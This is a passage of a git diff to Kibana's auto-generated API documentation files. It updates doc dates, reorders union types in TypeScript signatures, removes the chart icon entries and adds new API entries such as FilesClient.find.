+ "DeepPartial | undefined; tags?: string[] | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; kibana?: Readonly<{ alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; version?: string | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; namespace?: string | undefined; id?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; description?: string | undefined; name?: string | undefined; version?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; end?: string | undefined; original?: string | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}>>> | undefined" ], "path": "x-pack/plugins/event_log/generated/schemas.ts", "deprecated": false, @@ -1156,7 +1156,7 @@ "label": "IValidatedEvent", "description": [], "signature": [ - "Readonly<{ error?: Readonly<{ type?: string | undefined; id?: string | undefined; message?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; tags?: string[] | undefined; kibana?: Readonly<{ version?: string | undefined; alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; id?: string | undefined; namespace?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; name?: string | undefined; version?: string | undefined; description?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; end?: string | undefined; original?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined" + "Readonly<{ error?: Readonly<{ type?: string | undefined; message?: string | undefined; id?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; tags?: string[] | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; kibana?: Readonly<{ alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; version?: string | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; namespace?: string | undefined; id?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; description?: string | undefined; name?: string | undefined; version?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; end?: string | undefined; original?: string | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined" ], "path": "x-pack/plugins/event_log/generated/schemas.ts", "deprecated": false, diff --git a/api_docs/event_log.mdx b/api_docs/event_log.mdx index 508c23c296a42..08e0efb364837 100644 --- a/api_docs/event_log.mdx +++ b/api_docs/event_log.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/eventLog title: "eventLog" image: https://source.unsplash.com/400x175/?github description: API docs for the eventLog plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'eventLog'] --- import eventLogObj from './event_log.devdocs.json'; diff --git a/api_docs/expression_error.mdx b/api_docs/expression_error.mdx index 9512c20b14b80..68db5de55f03b 100644 --- a/api_docs/expression_error.mdx +++ b/api_docs/expression_error.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionError title: "expressionError" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionError plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionError'] --- import expressionErrorObj from './expression_error.devdocs.json'; diff --git a/api_docs/expression_gauge.devdocs.json b/api_docs/expression_gauge.devdocs.json index f40fb1a95cd51..67065298ff9a6 100644 --- a/api_docs/expression_gauge.devdocs.json +++ b/api_docs/expression_gauge.devdocs.json @@ -349,76 +349,6 @@ ], "returnComment": [], "initialIsOpen": false - }, - { - "parentPluginId": "expressionGauge", - "id": "def-public.HorizontalBulletIcon", - "type": "Function", - "tags": [], - "label": "HorizontalBulletIcon", - "description": [], - "signature": [ - "({ title, titleId, ...props }: Omit<", - "EuiIconProps", - ", \"type\">) => JSX.Element" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx", - "deprecated": false, - "children": [ - { - "parentPluginId": "expressionGauge", - "id": "def-public.HorizontalBulletIcon.$1", - "type": "Object", - "tags": [], - "label": "{ title, titleId, ...props }", - "description": [], - "signature": [ - "Omit<", - "EuiIconProps", - ", \"type\">" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx", - "deprecated": false, - "isRequired": true - } - ], - "returnComment": [], - "initialIsOpen": false - }, - { - "parentPluginId": "expressionGauge", - "id": "def-public.VerticalBulletIcon", - "type": "Function", - "tags": [], - "label": "VerticalBulletIcon", - "description": [], - "signature": [ - "({ title, titleId, ...props }: Omit<", - "EuiIconProps", - ", \"type\">) => JSX.Element" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx", - "deprecated": false, - "children": [ - { - "parentPluginId": "expressionGauge", - "id": "def-public.VerticalBulletIcon.$1", - "type": "Object", - "tags": [], - "label": "{ title, titleId, ...props }", - "description": [], - "signature": [ - "Omit<", - "EuiIconProps", - ", \"type\">" - ], - "path": "src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx", - "deprecated": false, - "isRequired": true - } - ], - "returnComment": [], - "initialIsOpen": false } ], "interfaces": [], diff --git a/api_docs/expression_gauge.mdx b/api_docs/expression_gauge.mdx index c0af29a90a4da..f512e7e9c75f3 100644 --- a/api_docs/expression_gauge.mdx +++ b/api_docs/expression_gauge.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionGauge title: "expressionGauge" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionGauge plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionGauge'] --- import expressionGaugeObj from './expression_gauge.devdocs.json'; @@ -21,7 +21,7 @@ Contact [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 61 | 0 | 61 | 2 | +| 57 | 0 | 57 | 2 | ## Client diff --git a/api_docs/expression_heatmap.devdocs.json b/api_docs/expression_heatmap.devdocs.json index 6cc1961115e4e..2838d206d03a2 100644 --- a/api_docs/expression_heatmap.devdocs.json +++ b/api_docs/expression_heatmap.devdocs.json @@ -2,43 +2,7 @@ "id": "expressionHeatmap", "client": { "classes": [], - "functions": [ - { - "parentPluginId": "expressionHeatmap", - "id": "def-public.HeatmapIcon", - "type": "Function", - "tags": [], - "label": "HeatmapIcon", - "description": [], - "signature": [ - "({ title, titleId, ...props }: Omit<", - "EuiIconProps", - ", \"type\">) => JSX.Element" - ], - "path": "src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx", - "deprecated": false, - "children": [ - { - "parentPluginId": "expressionHeatmap", - "id": "def-public.HeatmapIcon.$1", - "type": "Object", - "tags": [], - "label": "{ title, titleId, ...props }", - "description": [], - "signature": [ - "Omit<", - "EuiIconProps", - ", \"type\">" - ], - "path": "src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx", - "deprecated": false, - "isRequired": true - } - ], - "returnComment": [], - "initialIsOpen": false - } - ], + "functions": [], "interfaces": [], "enums": [], "misc": [], diff --git a/api_docs/expression_heatmap.mdx b/api_docs/expression_heatmap.mdx index cbc67c918cc69..040edccf8c8c3 100644 --- a/api_docs/expression_heatmap.mdx +++ b/api_docs/expression_heatmap.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionHeatmap title: "expressionHeatmap" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionHeatmap plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionHeatmap'] --- import expressionHeatmapObj from './expression_heatmap.devdocs.json'; @@ -21,12 +21,7 @@ Contact [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 107 | 0 | 103 | 3 | - -## Client - -### Functions - +| 105 | 0 | 101 | 3 | ## Common diff --git a/api_docs/expression_image.mdx b/api_docs/expression_image.mdx index 8c5d6c7de9f93..0d8b0cff8abb8 100644 --- a/api_docs/expression_image.mdx +++ b/api_docs/expression_image.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionImage title: "expressionImage" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionImage plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionImage'] --- import expressionImageObj from './expression_image.devdocs.json'; diff --git a/api_docs/expression_legacy_metric_vis.mdx b/api_docs/expression_legacy_metric_vis.mdx index 202fc360454ec..70526268ccb40 100644 --- a/api_docs/expression_legacy_metric_vis.mdx +++ b/api_docs/expression_legacy_metric_vis.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionLegacyMetricVis title: "expressionLegacyMetricVis" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionLegacyMetricVis plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionLegacyMetricVis'] --- import expressionLegacyMetricVisObj from './expression_legacy_metric_vis.devdocs.json'; diff --git a/api_docs/expression_metric.mdx b/api_docs/expression_metric.mdx index 5f0bb86d8a703..bb29f3d63221b 100644 --- a/api_docs/expression_metric.mdx +++ b/api_docs/expression_metric.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionMetric title: "expressionMetric" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionMetric plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionMetric'] --- import expressionMetricObj from './expression_metric.devdocs.json'; diff --git a/api_docs/expression_metric_vis.mdx b/api_docs/expression_metric_vis.mdx index 472c0353c2752..71ac4a737f38d 100644 --- a/api_docs/expression_metric_vis.mdx +++ b/api_docs/expression_metric_vis.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionMetricVis title: "expressionMetricVis" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionMetricVis plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionMetricVis'] --- import expressionMetricVisObj from './expression_metric_vis.devdocs.json'; diff --git a/api_docs/expression_partition_vis.mdx b/api_docs/expression_partition_vis.mdx index 3a2b6ea812e19..3bcf859578437 100644 --- a/api_docs/expression_partition_vis.mdx +++ b/api_docs/expression_partition_vis.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionPartitionVis title: "expressionPartitionVis" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionPartitionVis plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionPartitionVis'] --- import expressionPartitionVisObj from './expression_partition_vis.devdocs.json'; diff --git a/api_docs/expression_repeat_image.mdx b/api_docs/expression_repeat_image.mdx index 0d78383e9904f..fb5c7b545999b 100644 --- a/api_docs/expression_repeat_image.mdx +++ b/api_docs/expression_repeat_image.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionRepeatImage title: "expressionRepeatImage" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionRepeatImage plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionRepeatImage'] --- import expressionRepeatImageObj from './expression_repeat_image.devdocs.json'; diff --git a/api_docs/expression_reveal_image.mdx b/api_docs/expression_reveal_image.mdx index 259d840665074..b6c9983a9988c 100644 --- a/api_docs/expression_reveal_image.mdx +++ b/api_docs/expression_reveal_image.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionRevealImage title: "expressionRevealImage" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionRevealImage plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionRevealImage'] --- import expressionRevealImageObj from './expression_reveal_image.devdocs.json'; diff --git a/api_docs/expression_shape.devdocs.json b/api_docs/expression_shape.devdocs.json index 5cb96923eb878..efd37d1f3b4d0 100644 --- a/api_docs/expression_shape.devdocs.json +++ b/api_docs/expression_shape.devdocs.json @@ -612,7 +612,7 @@ "label": "strokeLinecap", "description": [], "signature": [ - "\"inherit\" | \"butt\" | \"round\" | \"square\" | undefined" + "\"butt\" | \"round\" | \"square\" | \"inherit\" | undefined" ], "path": "src/plugins/expression_shape/public/components/reusable/types.tsx", "deprecated": false @@ -651,7 +651,7 @@ "label": "strokeLinejoin", "description": [], "signature": [ - "\"inherit\" | \"round\" | \"miter\" | \"bevel\" | undefined" + "\"round\" | \"inherit\" | \"miter\" | \"bevel\" | undefined" ], "path": "src/plugins/expression_shape/public/components/reusable/types.tsx", "deprecated": false diff --git a/api_docs/expression_shape.mdx b/api_docs/expression_shape.mdx index 027f8760b20ab..971bc703be0e2 100644 --- a/api_docs/expression_shape.mdx +++ b/api_docs/expression_shape.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionShape title: "expressionShape" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionShape plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionShape'] --- import expressionShapeObj from './expression_shape.devdocs.json'; diff --git a/api_docs/expression_tagcloud.mdx b/api_docs/expression_tagcloud.mdx index fc8400c145fd5..0e5302d87a970 100644 --- a/api_docs/expression_tagcloud.mdx +++ b/api_docs/expression_tagcloud.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionTagcloud title: "expressionTagcloud" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionTagcloud plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionTagcloud'] --- import expressionTagcloudObj from './expression_tagcloud.devdocs.json'; diff --git a/api_docs/expression_x_y.devdocs.json b/api_docs/expression_x_y.devdocs.json index b1000cda6f9a8..a5afbe5ba1914 100644 --- a/api_docs/expression_x_y.devdocs.json +++ b/api_docs/expression_x_y.devdocs.json @@ -721,7 +721,7 @@ "label": "xScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false @@ -788,7 +788,13 @@ "label": "decorations", "description": [], "signature": [ - "DataDecorationConfigResult", + { + "pluginId": "expressionXY", + "scope": "common", + "docId": "kibExpressionXYPluginApi", + "section": "def-common.DataDecorationConfigResult", + "text": "DataDecorationConfigResult" + }, "[] | undefined" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", @@ -1807,7 +1813,7 @@ "label": "AvailableReferenceLineIcon", "description": [], "signature": [ - "\"alert\" | \"circle\" | \"asterisk\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\" | \"empty\"" + "\"circle\" | \"asterisk\" | \"alert\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\" | \"empty\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, @@ -2008,6 +2014,27 @@ "deprecated": false, "initialIsOpen": false }, + { + "parentPluginId": "expressionXY", + "id": "def-common.DataDecorationConfigResult", + "type": "Type", + "tags": [], + "label": "DataDecorationConfigResult", + "description": [], + "signature": [ + { + "pluginId": "expressionXY", + "scope": "common", + "docId": "kibExpressionXYPluginApi", + "section": "def-common.DataDecorationConfig", + "text": "DataDecorationConfig" + }, + " & { type: \"dataDecorationConfig\"; }" + ], + "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", + "deprecated": false, + "initialIsOpen": false + }, { "parentPluginId": "expressionXY", "id": "def-common.DataLayerConfig", @@ -2369,7 +2396,7 @@ "label": "XScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, @@ -2480,7 +2507,7 @@ "label": "YScaleType", "description": [], "signature": [ - "\"log\" | \"time\" | \"linear\" | \"sqrt\"" + "\"linear\" | \"log\" | \"time\" | \"sqrt\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, diff --git a/api_docs/expression_x_y.mdx b/api_docs/expression_x_y.mdx index 195f9ce08b2e2..fa81ffc3ef6ba 100644 --- a/api_docs/expression_x_y.mdx +++ b/api_docs/expression_x_y.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressionXY title: "expressionXY" image: https://source.unsplash.com/400x175/?github description: API docs for the expressionXY plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressionXY'] --- import expressionXYObj from './expression_x_y.devdocs.json'; @@ -21,7 +21,7 @@ Contact [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 151 | 0 | 141 | 12 | +| 152 | 0 | 142 | 11 | ## Client diff --git a/api_docs/expressions.devdocs.json b/api_docs/expressions.devdocs.json index aeff5f00d09e2..8bf0ad4f7cc46 100644 --- a/api_docs/expressions.devdocs.json +++ b/api_docs/expressions.devdocs.json @@ -6980,7 +6980,7 @@ "\nTracks state of execution.\n\n- `not-started` - before .start() method was called.\n- `pending` - immediately after .start() method is called.\n- `result` - when expression execution completed.\n- `error` - when execution failed with error." ], "signature": [ - "\"error\" | \"result\" | \"not-started\" | \"pending\"" + "\"error\" | \"not-started\" | \"pending\" | \"result\"" ], "path": "src/plugins/expressions/common/execution/container.ts", "deprecated": false @@ -10800,7 +10800,7 @@ "label": "padding", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | \"xl\" | \"xs\" | undefined" + "\"m\" | \"s\" | \"xs\" | \"l\" | \"xl\" | undefined" ], "path": "src/plugins/expressions/public/react_expression_renderer/react_expression_renderer.tsx", "deprecated": false @@ -11601,7 +11601,7 @@ "\nAllowed column names in a PointSeries" ], "signature": [ - "\"color\" | \"size\" | \"x\" | \"y\" | \"text\"" + "\"color\" | \"size\" | \"text\" | \"y\" | \"x\"" ], "path": "src/plugins/expressions/common/expression_types/specs/pointseries.ts", "deprecated": false, @@ -11784,7 +11784,7 @@ "\nTypes used in Expressions that don't map to a primitive cleanly:\n\n`date` is typed as a number or string, and represents a date" ], "signature": [ - "\"filter\" | \"date\"" + "\"date\" | \"filter\"" ], "path": "src/plugins/expressions/common/types/common.ts", "deprecated": false, @@ -17447,7 +17447,7 @@ "\nTracks state of execution.\n\n- `not-started` - before .start() method was called.\n- `pending` - immediately after .start() method is called.\n- `result` - when expression execution completed.\n- `error` - when execution failed with error." ], "signature": [ - "\"error\" | \"result\" | \"not-started\" | \"pending\"" + "\"error\" | \"not-started\" | \"pending\" | \"result\"" ], "path": "src/plugins/expressions/common/execution/container.ts", "deprecated": false @@ -20629,7 +20629,7 @@ "\nAllowed column names in a PointSeries" ], "signature": [ - "\"color\" | \"size\" | \"x\" | \"y\" | \"text\"" + "\"color\" | \"size\" | \"text\" | \"y\" | \"x\"" ], "path": "src/plugins/expressions/common/expression_types/specs/pointseries.ts", "deprecated": false, @@ -20782,7 +20782,7 @@ "\nTypes used in Expressions that don't map to a primitive cleanly:\n\n`date` is typed as a number or string, and represents a date" ], "signature": [ - "\"filter\" | \"date\"" + "\"date\" | \"filter\"" ], "path": "src/plugins/expressions/common/types/common.ts", "deprecated": false, @@ -28783,7 +28783,7 @@ "\nTracks state of execution.\n\n- `not-started` - before .start() method was called.\n- `pending` - immediately after .start() method is called.\n- `result` - when expression execution completed.\n- `error` - when execution failed with error." ], "signature": [ - "\"error\" | \"result\" | \"not-started\" | \"pending\"" + "\"error\" | \"not-started\" | \"pending\" | \"result\"" ], "path": "src/plugins/expressions/common/execution/container.ts", "deprecated": false @@ -34711,7 +34711,7 @@ "label": "MathArguments", "description": [], "signature": [ - "{ expression: string; onError?: \"false\" | \"null\" | \"zero\" | \"throw\" | undefined; }" + "{ expression: string; onError?: \"null\" | \"zero\" | \"false\" | \"throw\" | undefined; }" ], "path": "src/plugins/expressions/common/expression_functions/specs/math.ts", "deprecated": false, @@ -34801,7 +34801,7 @@ "\nAllowed column names in a PointSeries" ], "signature": [ - "\"color\" | \"size\" | \"x\" | \"y\" | \"text\"" + "\"color\" | \"size\" | \"text\" | \"y\" | \"x\"" ], "path": "src/plugins/expressions/common/expression_types/specs/pointseries.ts", "deprecated": false, @@ -35093,7 +35093,7 @@ "\nTypes used in Expressions that don't map to a primitive cleanly:\n\n`date` is typed as a number or string, and represents a date" ], "signature": [ - "\"filter\" | \"date\"" + "\"date\" | \"filter\"" ], "path": "src/plugins/expressions/common/types/common.ts", "deprecated": false, @@ -38717,7 +38717,7 @@ "label": "options", "description": [], "signature": [ - "(\"false\" | \"null\" | \"zero\" | \"throw\")[]" + "(\"null\" | \"zero\" | \"false\" | \"throw\")[]" ], "path": "src/plugins/expressions/common/expression_functions/specs/math.ts", "deprecated": false @@ -40317,7 +40317,7 @@ "label": "options", "description": [], "signature": [ - "(\"sum\" | \"min\" | \"max\" | \"average\")[]" + "(\"min\" | \"max\" | \"sum\" | \"average\")[]" ], "path": "src/plugins/expressions/common/expression_functions/specs/overall_metric.ts", "deprecated": false diff --git a/api_docs/expressions.mdx b/api_docs/expressions.mdx index a27a07152c99a..d5a70f521ffe7 100644 --- a/api_docs/expressions.mdx +++ b/api_docs/expressions.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressions title: "expressions" image: https://source.unsplash.com/400x175/?github description: API docs for the expressions plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressions'] --- import expressionsObj from './expressions.devdocs.json'; diff --git a/api_docs/features.mdx b/api_docs/features.mdx index 5b54a29b9791f..b85f190a0105b 100644 --- a/api_docs/features.mdx +++ b/api_docs/features.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/features title: "features" image: https://source.unsplash.com/400x175/?github description: API docs for the features plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'features'] --- import featuresObj from './features.devdocs.json'; diff --git a/api_docs/field_formats.mdx b/api_docs/field_formats.mdx index 5479ba7fba12f..1072dc5d534ca 100644 --- a/api_docs/field_formats.mdx +++ b/api_docs/field_formats.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/fieldFormats title: "fieldFormats" image: https://source.unsplash.com/400x175/?github description: API docs for the fieldFormats plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'fieldFormats'] --- import fieldFormatsObj from './field_formats.devdocs.json'; diff --git a/api_docs/file_upload.mdx b/api_docs/file_upload.mdx index 543e7b2c42356..8a2850648317a 100644 --- a/api_docs/file_upload.mdx +++ b/api_docs/file_upload.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/fileUpload title: "fileUpload" image: https://source.unsplash.com/400x175/?github description: API docs for the fileUpload plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'fileUpload'] --- import fileUploadObj from './file_upload.devdocs.json'; diff --git a/api_docs/files.devdocs.json b/api_docs/files.devdocs.json index 3c494b08bc77f..d7bb9ef6bf578 100644 --- a/api_docs/files.devdocs.json +++ b/api_docs/files.devdocs.json @@ -180,6 +180,55 @@ } ] }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.find", + "type": "Function", + "tags": [], + "label": "find", + "description": [ + "\nFind a set of files given some filters.\n" + ], + "signature": [ + "(args: { kind?: string[] | undefined; name?: string[] | undefined; meta?: {} | undefined; extension?: string[] | undefined; status?: string[] | undefined; } & ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.Pagination", + "text": "Pagination" + }, + ") => Promise<{ files: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileJSON", + "text": "FileJSON" + }, + "[]; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { 